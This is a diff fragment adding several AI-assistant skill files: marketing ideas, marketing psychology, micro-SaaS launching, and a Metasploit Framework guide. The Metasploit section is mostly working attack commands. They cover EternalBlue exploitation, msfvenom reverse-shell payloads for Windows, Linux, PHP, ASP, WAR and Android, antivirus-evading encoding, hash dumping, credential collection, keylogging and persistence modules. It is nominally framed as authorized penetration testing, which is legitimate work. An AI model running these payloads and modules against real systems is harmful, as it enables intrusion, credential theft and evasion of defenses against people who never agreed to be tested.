## Implementation Tips
When suggesting ideas, consider:
**By Stage:**
- Pre-launch: Waitlist referrals, early access, Product Hunt prep
- Early stage: Content, SEO, community, founder-led sales
- Growth stage: Paid acquisition, partnerships, events
- Scale: Brand, international, acquisitions
**By Budget:**
- Free: Content, SEO, community, social media
- Low budget: Targeted ads, sponsorships, tools
- Medium budget: Events, partnerships, PR
- High budget: Acquisitions, conferences, brand campaigns
**By Timeline:**
- Quick wins: Ads, email, social posts
- Medium-term: Content, SEO, community building
- Long-term: Brand, thought leadership, platform effects
---
## Questions to Ask
If you need more context:
1. What's your product and who's your target customer?
2. What's your current stage and main growth goal?
3. What's your marketing budget and team size?
4. What have you already tried that worked or didn't?
5. What are your competitors doing that you admire or want to counter?
---
## Output Format
When recommending ideas:
**For each recommended idea:**
- **Idea name**: One-line description
- **Why it fits**: Connection to their situation
- **How to start**: First 2-3 implementation steps
- **Expected outcome**: What success looks like
- **Resources needed**: Time, budget, skills required
---
## Related Skills
- **programmatic-seo**: For scaling SEO content (#40)
- **competitor-alternatives**: For comparison pages (#2)
- **email-sequence**: For email marketing tactics
- **free-tool-strategy**: For engineering as marketing (#30)
- **page-cro**: For landing page optimization
- **ab-test-setup**: For testing marketing experiments

451
skills/marketing-psychology/SKILL.md Normal file
View File

@@ -0,0 +1,451 @@
---
name: marketing-psychology
description: "When the user wants to apply psychological principles, mental models, or behavioral science to marketing. Also use when the user mentions 'psychology,' 'mental models,' 'cognitive bias,' 'persuasion,' 'behavioral science,' 'why people buy,' 'decision-making,' or 'consumer behavior.' This skill provides 70+ mental models organized for marketing application."
---
# Marketing Psychology & Mental Models
You are an expert in applying psychological principles and mental models to marketing. Your goal is to help users understand why people buy, how to influence behavior ethically, and how to make better marketing decisions.
## How to Use This Skill
Mental models are thinking tools that help you make better decisions, understand customer behavior, and create more effective marketing. When helping users:
1. Identify which mental models apply to their situation
2. Explain the psychology behind the model
3. Provide specific marketing applications
4. Suggest how to implement ethically
---
## Foundational Thinking Models
These models sharpen your strategy and help you solve the right problems.
### First Principles
Break problems down to basic truths and build solutions from there. Instead of copying competitors, ask "why" repeatedly to find root causes. Use the 5 Whys technique to tunnel down to what really matters.
**Marketing application**: Don't assume you need content marketing because competitors do. Ask why you need it, what problem it solves, and whether there's a better solution.
### Jobs to Be Done
People don't buy products—they "hire" them to get a job done. Focus on the outcome customers want, not features.
**Marketing application**: A drill buyer doesn't want a drill—they want a hole. Frame your product around the job it accomplishes, not its specifications.
### Circle of Competence
Know what you're good at and stay within it. Venture outside only with proper learning or expert help.
**Marketing application**: Don't chase every channel. Double down where you have genuine expertise and competitive advantage.
### Inversion
Instead of asking "How do I succeed?", ask "What would guarantee failure?" Then avoid those things.
**Marketing application**: List everything that would make your campaign fail—confusing messaging, wrong audience, slow landing page—then systematically prevent each.
### Occam's Razor
The simplest explanation is usually correct. Avoid overcomplicating strategies or attributing results to complex causes when simple ones suffice.
**Marketing application**: If conversions dropped, check the obvious first (broken form, page speed) before assuming complex attribution issues.
### Pareto Principle (80/20 Rule)
Roughly 80% of results come from 20% of efforts. Identify and focus on the vital few.
**Marketing application**: Find the 20% of channels, customers, or content driving 80% of results. Cut or reduce the rest.
### Local vs. Global Optima
A local optimum is the best solution nearby, but a global optimum is the best overall. Don't get stuck optimizing the wrong thing.
**Marketing application**: Optimizing email subject lines (local) won't help if email isn't the right channel (global). Zoom out before zooming in.
### Theory of Constraints
Every system has one bottleneck limiting throughput. Find and fix that constraint before optimizing elsewhere.
**Marketing application**: If your funnel converts well but traffic is low, more conversion optimization won't help. Fix the traffic bottleneck first.
### Opportunity Cost
Every choice has a cost—what you give up by not choosing alternatives. Consider what you're saying no to.
**Marketing application**: Time spent on a low-ROI channel is time not spent on high-ROI activities. Always compare against alternatives.
### Law of Diminishing Returns
After a point, additional investment yields progressively smaller gains.
**Marketing application**: The 10th blog post won't have the same impact as the first. Know when to diversify rather than double down.
### Second-Order Thinking
Consider not just immediate effects, but the effects of those effects.
**Marketing application**: A flash sale boosts revenue (first order) but may train customers to wait for discounts (second order).
### Map ≠ Territory
Models and data represent reality but aren't reality itself. Don't confuse your analytics dashboard with actual customer experience.
**Marketing application**: Your customer persona is a useful model, but real customers are more complex. Stay in touch with actual users.
### Probabilistic Thinking
Think in probabilities, not certainties. Estimate likelihoods and plan for multiple outcomes.
**Marketing application**: Don't bet everything on one campaign. Spread risk and plan for scenarios where your primary strategy underperforms.
### Barbell Strategy
Combine extreme safety with small high-risk/high-reward bets. Avoid the mediocre middle.
**Marketing application**: Put 80% of budget into proven channels, 20% into experimental bets. Avoid moderate-risk, moderate-reward middle.
---
## Understanding Buyers & Human Psychology
These models explain how customers think, decide, and behave.
### Fundamental Attribution Error
People attribute others' behavior to character, not circumstances. "They didn't buy because they're not serious" vs. "The checkout was confusing."
**Marketing application**: When customers don't convert, examine your process before blaming them. The problem is usually situational, not personal.
### Mere Exposure Effect
People prefer things they've seen before. Familiarity breeds liking.
**Marketing application**: Consistent brand presence builds preference over time. Repetition across channels creates comfort and trust.
### Availability Heuristic
People judge likelihood by how easily examples come to mind. Recent or vivid events seem more common.
**Marketing application**: Case studies and testimonials make success feel more achievable. Make positive outcomes easy to imagine.
### Confirmation Bias
People seek information confirming existing beliefs and ignore contradictory evidence.
**Marketing application**: Understand what your audience already believes and align messaging accordingly. Fighting beliefs head-on rarely works.
### The Lindy Effect
The longer something has survived, the longer it's likely to continue. Old ideas often outlast new ones.
**Marketing application**: Proven marketing principles (clear value props, social proof) outlast trendy tactics. Don't abandon fundamentals for fads.
### Mimetic Desire
People want things because others want them. Desire is socially contagious.
**Marketing application**: Show that desirable people want your product. Waitlists, exclusivity, and social proof trigger mimetic desire.
### Sunk Cost Fallacy
People continue investing in something because of past investment, even when it's no longer rational.
**Marketing application**: Know when to kill underperforming campaigns. Past spend shouldn't justify future spend if results aren't there.
### Endowment Effect
People value things more once they own them.
**Marketing application**: Free trials, samples, and freemium models let customers "own" the product, making them reluctant to give it up.
### IKEA Effect
People value things more when they've put effort into creating them.
**Marketing application**: Let customers customize, configure, or build something. Their investment increases perceived value and commitment.
### Zero-Price Effect
Free isn't just a low price—it's psychologically different. "Free" triggers irrational preference.
**Marketing application**: Free tiers, free trials, and free shipping have disproportionate appeal. The jump from $1 to $0 is bigger than $2 to $1.
### Hyperbolic Discounting / Present Bias
People strongly prefer immediate rewards over future ones, even when waiting is more rational.
**Marketing application**: Emphasize immediate benefits ("Start saving time today") over future ones ("You'll see ROI in 6 months").
### Status-Quo Bias
People prefer the current state of affairs. Change requires effort and feels risky.
**Marketing application**: Reduce friction to switch. Make the transition feel safe and easy. "Import your data in one click."
### Default Effect
People tend to accept pre-selected options. Defaults are powerful.
**Marketing application**: Pre-select the plan you want customers to choose. Opt-out beats opt-in for subscriptions (ethically applied).
### Paradox of Choice
Too many options overwhelm and paralyze. Fewer choices often lead to more decisions.
**Marketing application**: Limit options. Three pricing tiers beat seven. Recommend a single "best for most" option.
### Goal-Gradient Effect
People accelerate effort as they approach a goal. Progress visualization motivates action.
**Marketing application**: Show progress bars, completion percentages, and "almost there" messaging to drive completion.
### Peak-End Rule
People judge experiences by the peak (best or worst moment) and the end, not the average.
**Marketing application**: Design memorable peaks (surprise upgrades, delightful moments) and strong endings (thank you pages, follow-up emails).
### Zeigarnik Effect
Unfinished tasks occupy the mind more than completed ones. Open loops create tension.
**Marketing application**: "You're 80% done" creates pull to finish. Incomplete profiles, abandoned carts, and cliffhangers leverage this.
### Pratfall Effect
Competent people become more likable when they show a small flaw. Perfection is less relatable.
**Marketing application**: Admitting a weakness ("We're not the cheapest, but...") can increase trust and differentiation.
### Curse of Knowledge
Once you know something, you can't imagine not knowing it. Experts struggle to explain simply.
**Marketing application**: Your product seems obvious to you but confusing to newcomers. Test copy with people unfamiliar with your space.
### Mental Accounting
People treat money differently based on its source or intended use, even though money is fungible.
**Marketing application**: Frame costs in favorable mental accounts. "$3/day" feels different than "$90/month" even though it's the same.
### Regret Aversion
People avoid actions that might cause regret, even if the expected outcome is positive.
**Marketing application**: Address regret directly. Money-back guarantees, free trials, and "no commitment" messaging reduce regret fear.
### Bandwagon Effect / Social Proof
People follow what others are doing. Popularity signals quality and safety.
**Marketing application**: Show customer counts, testimonials, logos, reviews, and "trending" indicators. Numbers create confidence.
---
## Influencing Behavior & Persuasion
These models help you ethically influence customer decisions.
### Reciprocity Principle
People feel obligated to return favors. Give first, and people want to give back.
**Marketing application**: Free content, free tools, and generous free tiers create reciprocal obligation. Give value before asking for anything.
### Commitment & Consistency
Once people commit to something, they want to stay consistent with that commitment.
**Marketing application**: Get small commitments first (email signup, free trial). People who've taken one step are more likely to take the next.
### Authority Bias
People defer to experts and authority figures. Credentials and expertise create trust.
**Marketing application**: Feature expert endorsements, certifications, "featured in" logos, and thought leadership content.
### Liking / Similarity Bias
People say yes to those they like and those similar to themselves.
**Marketing application**: Use relatable spokespeople, founder stories, and community language. "Built by marketers for marketers" signals similarity.
### Unity Principle
Shared identity drives influence. "One of us" is powerful.
**Marketing application**: Position your brand as part of the customer's tribe. Use insider language and shared values.
### Scarcity / Urgency Heuristic
Limited availability increases perceived value. Scarcity signals desirability.
**Marketing application**: Limited-time offers, low-stock warnings, and exclusive access create urgency. Only use when genuine.
### Foot-in-the-Door Technique
Start with a small request, then escalate. Compliance with small requests leads to compliance with larger ones.
**Marketing application**: Free trial → paid plan → annual plan → enterprise. Each step builds on the last.
### Door-in-the-Face Technique
Start with an unreasonably large request, then retreat to what you actually want. The contrast makes the second request seem reasonable.
**Marketing application**: Show enterprise pricing first, then reveal the affordable starter plan. The contrast makes it feel like a deal.
### Loss Aversion / Prospect Theory
Losses feel roughly twice as painful as equivalent gains feel good. People will work harder to avoid losing than to gain.
**Marketing application**: Frame in terms of what they'll lose by not acting. "Don't miss out" beats "You could gain."
### Anchoring Effect
The first number people see heavily influences subsequent judgments.
**Marketing application**: Show the higher price first (original price, competitor price, enterprise tier) to anchor expectations.
### Decoy Effect
Adding a third, inferior option makes one of the original two look better.
**Marketing application**: A "decoy" pricing tier that's clearly worse value makes your preferred tier look like the obvious choice.
### Framing Effect
How something is presented changes how it's perceived. Same facts, different frames.
**Marketing application**: "90% success rate" vs. "10% failure rate" are identical but feel different. Frame positively.
### Contrast Effect
Things seem different depending on what they're compared to.
**Marketing application**: Show the "before" state clearly. The contrast with your "after" makes improvements vivid.
---
## Pricing Psychology
These models specifically address how people perceive and respond to prices.
### Charm Pricing / Left-Digit Effect
Prices ending in 9 seem significantly lower than the next round number. $99 feels much cheaper than $100.
**Marketing application**: Use .99 or .95 endings for value-focused products. The left digit dominates perception.
### Rounded-Price (Fluency) Effect
Round numbers feel premium and are easier to process. $100 signals quality; $99 signals value.
**Marketing application**: Use round prices for premium products ($500/month), charm prices for value products ($497/month).
### Rule of 100
For prices under $100, percentage discounts seem larger ("20% off"). For prices over $100, absolute discounts seem larger ("$50 off").
**Marketing application**: $80 product: "20% off" beats "$16 off." $500 product: "$100 off" beats "20% off."
### Price Relativity / Good-Better-Best
People judge prices relative to options presented. A middle tier seems reasonable between cheap and expensive.
**Marketing application**: Three tiers where the middle is your target. The expensive tier makes it look reasonable; the cheap tier provides an anchor.
### Mental Accounting (Pricing)
Framing the same price differently changes perception.
**Marketing application**: "$1/day" feels cheaper than "$30/month." "Less than your morning coffee" reframes the expense.
---
## Design & Delivery Models
These models help you design effective marketing systems.
### Hick's Law
Decision time increases with the number and complexity of choices. More options = slower decisions = more abandonment.
**Marketing application**: Simplify choices. One clear CTA beats three. Fewer form fields beat more.
### AIDA Funnel
Attention → Interest → Desire → Action. The classic customer journey model.
**Marketing application**: Structure pages and campaigns to move through each stage. Capture attention before building desire.
### Rule of 7
Prospects need roughly 7 touchpoints before converting. One ad rarely converts; sustained presence does.
**Marketing application**: Build multi-touch campaigns across channels. Retargeting, email sequences, and consistent presence compound.
### Nudge Theory / Choice Architecture
Small changes in how choices are presented significantly influence decisions.
**Marketing application**: Default selections, strategic ordering, and friction reduction guide behavior without restricting choice.
### BJ Fogg Behavior Model
Behavior = Motivation × Ability × Prompt. All three must be present for action.
**Marketing application**: High motivation but hard to do = won't happen. Easy to do but no prompt = won't happen. Design for all three.
### EAST Framework
Make desired behaviors: Easy, Attractive, Social, Timely.
**Marketing application**: Reduce friction (easy), make it appealing (attractive), show others doing it (social), ask at the right moment (timely).
### COM-B Model
Behavior requires: Capability, Opportunity, Motivation.
**Marketing application**: Can they do it (capability)? Is the path clear (opportunity)? Do they want to (motivation)? Address all three.
### Activation Energy
The initial energy required to start something. High activation energy prevents action even if the task is easy overall.
**Marketing application**: Reduce starting friction. Pre-fill forms, offer templates, show quick wins. Make the first step trivially easy.
### North Star Metric
One metric that best captures the value you deliver to customers. Focus creates alignment.
**Marketing application**: Identify your North Star (active users, completed projects, revenue per customer) and align all efforts toward it.
### The Cobra Effect
When incentives backfire and produce the opposite of intended results.
**Marketing application**: Test incentive structures. A referral bonus might attract low-quality referrals gaming the system.
---
## Growth & Scaling Models
These models explain how marketing compounds and scales.
### Feedback Loops
Output becomes input, creating cycles. Positive loops accelerate growth; negative loops create decline.
**Marketing application**: Build virtuous cycles: more users → more content → better SEO → more users. Identify and strengthen positive loops.
### Compounding
Small, consistent gains accumulate into large results over time. Early gains matter most.
**Marketing application**: Consistent content, SEO, and brand building compound. Start early; benefits accumulate exponentially.
### Network Effects
A product becomes more valuable as more people use it.
**Marketing application**: Design features that improve with more users: shared workspaces, integrations, marketplaces, communities.
### Flywheel Effect
Sustained effort creates momentum that eventually maintains itself. Hard to start, easy to maintain.
**Marketing application**: Content → traffic → leads → customers → case studies → more content. Each element powers the next.
### Switching Costs
The price (time, money, effort, data) of changing to a competitor. High switching costs create retention.
**Marketing application**: Increase switching costs ethically: integrations, data accumulation, workflow customization, team adoption.
### Exploration vs. Exploitation
Balance trying new things (exploration) with optimizing what works (exploitation).
**Marketing application**: Don't abandon working channels for shiny new ones, but allocate some budget to experiments.
### Critical Mass / Tipping Point
The threshold after which growth becomes self-sustaining.
**Marketing application**: Focus resources on reaching critical mass in one segment before expanding. Depth before breadth.
### Survivorship Bias
Focusing on successes while ignoring failures that aren't visible.
**Marketing application**: Study failed campaigns, not just successful ones. The viral hit you're copying had 99 failures you didn't see.
---
## Quick Reference
When facing a marketing challenge, consider:
| Challenge | Relevant Models |
|-----------|-----------------|
| Low conversions | Hick's Law, Activation Energy, BJ Fogg, Friction |
| Price objections | Anchoring, Framing, Mental Accounting, Loss Aversion |
| Building trust | Authority, Social Proof, Reciprocity, Pratfall Effect |
| Increasing urgency | Scarcity, Loss Aversion, Zeigarnik Effect |
| Retention/churn | Endowment Effect, Switching Costs, Status-Quo Bias |
| Growth stalling | Theory of Constraints, Local vs Global Optima, Compounding |
| Decision paralysis | Paradox of Choice, Default Effect, Nudge Theory |
| Onboarding | Goal-Gradient, IKEA Effect, Commitment & Consistency |
---
## Questions to Ask
If you need more context:
1. What specific behavior are you trying to influence?
2. What does your customer believe before encountering your marketing?
3. Where in the journey (awareness → consideration → decision) is this?
4. What's currently preventing the desired action?
5. Have you tested this with real customers?
---
## Related Skills
- **page-cro**: Apply psychology to page optimization
- **copywriting**: Write copy using psychological principles
- **popup-cro**: Use triggers and psychology in popups
- **pricing-page optimization**: See page-cro for pricing psychology
- **ab-test-setup**: Test psychological hypotheses

475
skills/metasploit-framework/SKILL.md Normal file
View File

@@ -0,0 +1,475 @@
---
name: Metasploit Framework
description: This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
---
# Metasploit Framework
## Purpose
Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.
## Prerequisites
### Required Tools
```bash
# Metasploit comes pre-installed on Kali Linux
# For other systems:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Start PostgreSQL for database support
sudo systemctl start postgresql
sudo msfdb init
```
### Required Knowledge
- Network and system fundamentals
- Understanding of vulnerabilities and exploits
- Basic programming concepts
- Target enumeration techniques
### Required Access
- Written authorization for testing
- Network access to target systems
- Understanding of scope and rules of engagement
## Outputs and Deliverables
1. **Exploitation Evidence** - Screenshots and logs of successful compromises
2. **Session Logs** - Command history and extracted data
3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references
4. **Post-Exploitation Artifacts** - Credentials, files, and system information
## Core Workflow
### Phase 1: MSFConsole Basics
Launch and navigate the Metasploit console:
```bash
# Start msfconsole
msfconsole
# Quiet mode (skip banner)
msfconsole -q
# Basic navigation commands
msf6 > help # Show all commands
msf6 > search [term] # Search modules
msf6 > use [module] # Select module
msf6 > info # Show module details
msf6 > show options # Display required options
msf6 > set [OPTION] [value] # Configure option
msf6 > run / exploit # Execute module
msf6 > back # Return to main console
msf6 > exit # Exit msfconsole
```
### Phase 2: Module Types
Understand the different module categories:
```bash
# 1. Exploit Modules - Target specific vulnerabilities
msf6 > show exploits
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 2. Payload Modules - Code executed after exploitation
msf6 > show payloads
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 3. Auxiliary Modules - Scanning, fuzzing, enumeration
msf6 > show auxiliary
msf6 > use auxiliary/scanner/smb/smb_version
# 4. Post-Exploitation Modules - Actions after compromise
msf6 > show post
msf6 > use post/windows/gather/hashdump
# 5. Encoders - Obfuscate payloads
msf6 > show encoders
msf6 > set ENCODER x86/shikata_ga_nai
# 6. Nops - No-operation padding for buffer overflows
msf6 > show nops
# 7. Evasion - Bypass security controls
msf6 > show evasion
```
### Phase 3: Searching for Modules
Find appropriate modules for targets:
```bash
# Search by name
msf6 > search eternalblue
# Search by CVE
msf6 > search cve:2017-0144
# Search by platform
msf6 > search platform:windows type:exploit
# Search by type and keyword
msf6 > search type:auxiliary smb
# Filter by rank (excellent, great, good, normal, average, low, manual)
msf6 > search rank:excellent
# Combined search
msf6 > search type:exploit platform:linux apache
# View search results columns:
# Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description
```
### Phase 4: Configuring Exploits
Set up an exploit for execution:
```bash
# Select exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# View required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Set target host
msf6 exploit(...) > set RHOSTS 192.168.1.100
# Set target port (if different from default)
msf6 exploit(...) > set RPORT 445
# View compatible payloads
msf6 exploit(...) > show payloads
# Set payload
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Set local host for reverse connection
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444
# View all options again to verify
msf6 exploit(...) > show options
# Check if target is vulnerable (if supported)
msf6 exploit(...) > check
# Execute exploit
msf6 exploit(...) > exploit
# or
msf6 exploit(...) > run
```
### Phase 5: Payload Types
Select appropriate payload for the situation:
```bash
# Singles - Self-contained, no staging
windows/shell_reverse_tcp
linux/x86/shell_bind_tcp
# Stagers - Small payload that downloads larger stage
windows/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
# Stages - Downloaded by stager, provides full functionality
# Meterpreter, VNC, shell
# Payload naming convention:
# [platform]/[architecture]/[payload_type]/[connection_type]
# Examples:
windows/x64/meterpreter/reverse_tcp
linux/x86/shell/bind_tcp
php/meterpreter/reverse_tcp
java/meterpreter/reverse_https
android/meterpreter/reverse_tcp
```
### Phase 6: Meterpreter Session
Work with Meterpreter post-exploitation:
```bash
# After successful exploitation, you get Meterpreter prompt
meterpreter >
# System Information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
# File System Operations
meterpreter > pwd
meterpreter > ls
meterpreter > cd C:\\Users
meterpreter > download file.txt /tmp/
meterpreter > upload /tmp/tool.exe C:\\
# Process Management
meterpreter > ps
meterpreter > migrate [PID]
meterpreter > kill [PID]
# Networking
meterpreter > ipconfig
meterpreter > netstat
meterpreter > route
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1
# Privilege Escalation
meterpreter > getsystem
meterpreter > getprivs
# Credential Harvesting
meterpreter > hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
# Screenshots and Keylogging
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
# Shell Access
meterpreter > shell
C:\Windows\system32> whoami
C:\Windows\system32> exit
meterpreter >
# Background Session
meterpreter > background
msf6 exploit(...) > sessions -l
msf6 exploit(...) > sessions -i 1
```
### Phase 7: Auxiliary Modules
Use auxiliary modules for reconnaissance:
```bash
# SMB Version Scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run
# Port Scanner
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set PORTS 1-1000
msf6 auxiliary(...) > run
# SSH Version Scanner
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run
# FTP Anonymous Login
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run
# HTTP Directory Scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run
# Brute Force Modules
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > run
```
### Phase 8: Post-Exploitation Modules
Run post modules on active sessions:
```bash
# List sessions
msf6 > sessions -l
# Run post module on specific session
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(...) > run
# Or run directly from Meterpreter
meterpreter > run post/windows/gather/hashdump
# Common Post Modules
# Credential Gathering
post/windows/gather/credentials/credential_collector
post/windows/gather/lsa_secrets
post/windows/gather/cachedump
post/multi/gather/ssh_creds
# System Enumeration
post/windows/gather/enum_applications
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_shares
post/linux/gather/enum_configs
# Privilege Escalation
post/windows/escalate/getsystem
post/multi/recon/local_exploit_suggester
# Persistence
post/windows/manage/persistence_exe
post/linux/manage/sshkey_persistence
# Pivoting
post/multi/manage/autoroute
```
### Phase 9: Payload Generation with msfvenom
Create standalone payloads:
```bash
# Basic Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php
# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py
# PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1
# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp
# WAR file (Tomcat)
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk
# Encoded payload (evade AV)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
# List available formats
msfvenom --list formats
# List available encoders
msfvenom --list encoders
```
### Phase 10: Setting Up Handlers
Configure listener for incoming connections:
```bash
# Manual handler setup
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
# The -j flag runs as background job
msf6 > jobs -l
# When payload executes on target, session opens
[*] Meterpreter session 1 opened
# Interact with session
msf6 > sessions -i 1
```
## Quick Reference
### Essential MSFConsole Commands
| Command | Description |
|---------|-------------|
| `search [term]` | Search for modules |
| `use [module]` | Select a module |
| `info` | Display module information |
| `show options` | Show configurable options |
| `set [OPT] [val]` | Set option value |
| `setg [OPT] [val]` | Set global option |
| `run` / `exploit` | Execute module |
| `check` | Verify target vulnerability |
| `back` | Deselect module |
| `sessions -l` | List active sessions |
| `sessions -i [N]` | Interact with session |
| `jobs -l` | List background jobs |
| `db_nmap` | Run nmap with database |
### Meterpreter Essential Commands
| Command | Description |
|---------|-------------|
| `sysinfo` | System information |
| `getuid` | Current user |
| `getsystem` | Attempt privilege escalation |
| `hashdump` | Dump password hashes |
| `shell` | Drop to system shell |
| `upload/download` | File transfer |
| `screenshot` | Capture screen |
| `keyscan_start` | Start keylogger |
| `migrate [PID]` | Move to another process |
| `background` | Background session |
| `portfwd` | Port forwarding |
### Common Exploit Modules
```bash
# Windows
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms08_067_netapi
exploit/windows/http/iis_webdav_upload_asp
exploit/windows/local/bypassuac
# Linux
exploit/linux/ssh/sshexec
exploit/linux/local/overlayfs_priv_esc
exploit/multi/http/apache_mod_cgi_bash_env_exec
# Web Applications
exploit/multi/http/tomcat_mgr_upload
exploit/unix/webapp/wp_admin_shell_upload
exploit/multi/http/jenkins_script_console
```
## Constraints and Limitations
### Legal Requirements
- Only use on systems you own or have written authorization to test
- Document all testing activities
- Follow rules of engagement
- Report all findings to appropriate parties
### Technical Limitations
- Modern AV/EDR may detect Metasploit payloads
- Some exploits require specific target configurations
- Firewall rules may block reverse connections
- Not all exploits work on all target versions
### Operational Security
- Use encrypted channels (reverse_https) when possible
- Clean up artifacts after testing
- Avoid detection by monitoring systems
- Limit post-exploitation to agreed scope
## Troubleshooting
| Issue | Solutions |
|-------|-----------|
| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` |
| Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads |
| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript |
| Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates |

212
skills/micro-saas-launcher/SKILL.md Normal file
View File

@@ -0,0 +1,212 @@
---
name: micro-saas-launcher
description: "Expert in launching small, focused SaaS products fast - the indie hacker approach to building profitable software. Covers idea validation, MVP development, pricing, launch strategies, and growing to sustainable revenue. Ship in weeks, not months. Use when: micro saas, indie hacker, small saas, side project, saas mvp."
source: vibeship-spawner-skills (Apache 2.0)
---
# Micro-SaaS Launcher
**Role**: Micro-SaaS Launch Architect
You ship fast and iterate. You know the difference between a side project
and a business. You've seen what works in the indie hacker community. You
help people go from idea to paying customers in weeks, not years. You
focus on sustainable, profitable businesses - not unicorn hunting.
## Capabilities
- Micro-SaaS strategy
- MVP scoping
- Pricing strategies
- Launch playbooks
- Indie hacker patterns
- Solo founder tech stack
- Early traction
- SaaS metrics
## Patterns
### Idea Validation
Validating before building
**When to use**: When starting a micro-SaaS
```javascript
## Idea Validation
### The Validation Framework
| Question | How to Answer |
|----------|---------------|
| Problem exists? | Talk to 5+ potential users |
| People pay? | Pre-sell or find competitors |
| You can build? | Can MVP ship in 2 weeks? |
| You can reach them? | Distribution channel exists? |
### Quick Validation Methods
1. **Landing page test**
- Build landing page
- Drive traffic (ads, community)
- Measure signups/interest
2. **Pre-sale**
- Sell before building
- "Join waitlist for 50% off"
- If no sales, pivot
3. **Competitor check**
- Competitors = validation
- No competitors = maybe no market
- Find gap you can fill
### Red Flags
- "Everyone needs this" (too broad)
- No clear buyer (who pays?)
- Requires marketplace dynamics
- Needs massive scale to work
### Green Flags
- Clear, specific pain point
- People already paying for alternatives
- You have domain expertise
- Distribution channel access
```
### MVP Speed Run
Ship MVP in 2 weeks
**When to use**: When building first version
```javascript
## MVP Speed Run
### The Stack (Solo-Founder Optimized)
| Component | Choice | Why |
|-----------|--------|-----|
| Frontend | Next.js | Full-stack, Vercel deploy |
| Backend | Next.js API / Supabase | Fast, scalable |
| Database | Supabase Postgres | Free tier, auth included |
| Auth | Supabase / Clerk | Don't build auth |
| Payments | Stripe | Industry standard |
| Email | Resend / Loops | Transactional + marketing |
| Hosting | Vercel | Free tier generous |
### Week 1: Core
```
Day 1-2: Auth + basic UI
Day 3-4: Core feature (one thing)
Day 5-6: Stripe integration
Day 7: Polish and bug fixes
```
### Week 2: Launch Ready
```
Day 1-2: Landing page
Day 3: Email flows (welcome, etc.)
Day 4: Legal (privacy, terms)
Day 5: Final testing
Day 6-7: Soft launch
```
### What to Skip in MVP
- Perfect design (good enough is fine)
- All features (one core feature only)
- Scale optimization (worry later)
- Custom auth (use a service)
- Multiple pricing tiers (start simple)
```
### Pricing Strategy
Pricing your micro-SaaS
**When to use**: When setting prices
```javascript
## Pricing Strategy
### Pricing Tiers for Micro-SaaS
| Strategy | Best For |
|----------|----------|
| Single price | Simple tools, clear value |
| Two tiers | Free/paid or Basic/Pro |
